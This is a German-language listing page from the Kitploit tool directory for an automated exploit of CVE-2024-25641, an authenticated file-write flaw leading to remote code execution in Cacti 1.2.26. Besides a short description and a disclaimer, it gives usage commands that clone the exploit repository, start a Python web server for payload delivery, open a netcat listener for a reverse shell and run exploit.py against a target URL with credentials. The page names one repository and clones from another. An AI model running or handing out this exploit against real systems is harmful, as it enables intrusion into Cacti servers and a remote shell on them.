Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26 — CVE-2024-25641 - Automatisierter RCE-Exploit - Cacti 1.2.26 | Kitploit
Tools/GitHubGitHub/leo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubleo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

CVE-2024-25641 - Automatisierter RCE-Exploit - Cacti 1.2.26

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
101vor 1 JahrNoch nicht geprüft

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

Vollautomatischer Exploit für CVE-2024-25641. Wenn ein Benutzer authentifiziert ist, ist Cacti Version 1.2.26 anfällig für eine Schwachstelle zum willkürlichen Dateischreiben, die über die Funktion „Paketimport“ ausgenutzt werden kann, ermöglicht es authentifizierten Benutzern mit der Berechtigung „Vorlagen importieren“, beliebigen PHP-Code auf dem Webserver auszuführen (RCE).

Danksagung an diesen PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (Ich habe dies lediglich automatisiert, um einen ersten Zugang zu erhalten.)

HAFTUNGSAUSSCHLUSS

Dieses Tool ist ausschließlich für Bildungs- und Testzwecke bestimmt. Der Autor dieses Tools ist nicht verantwortlich für Missbrauch oder illegale Aktivitäten, die damit durchgeführt werden. Verwenden Sie dieses Tool nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal und unethisch.

Beispiel zur Verwendung

root@kitploit:~
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>

# Setup netcat listener
nc -lvnp <LOCAL_PORT>

# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>

Sie können sich auch Folgendes ansehen : CVE-2024-25641 PoC

Tool herunterladen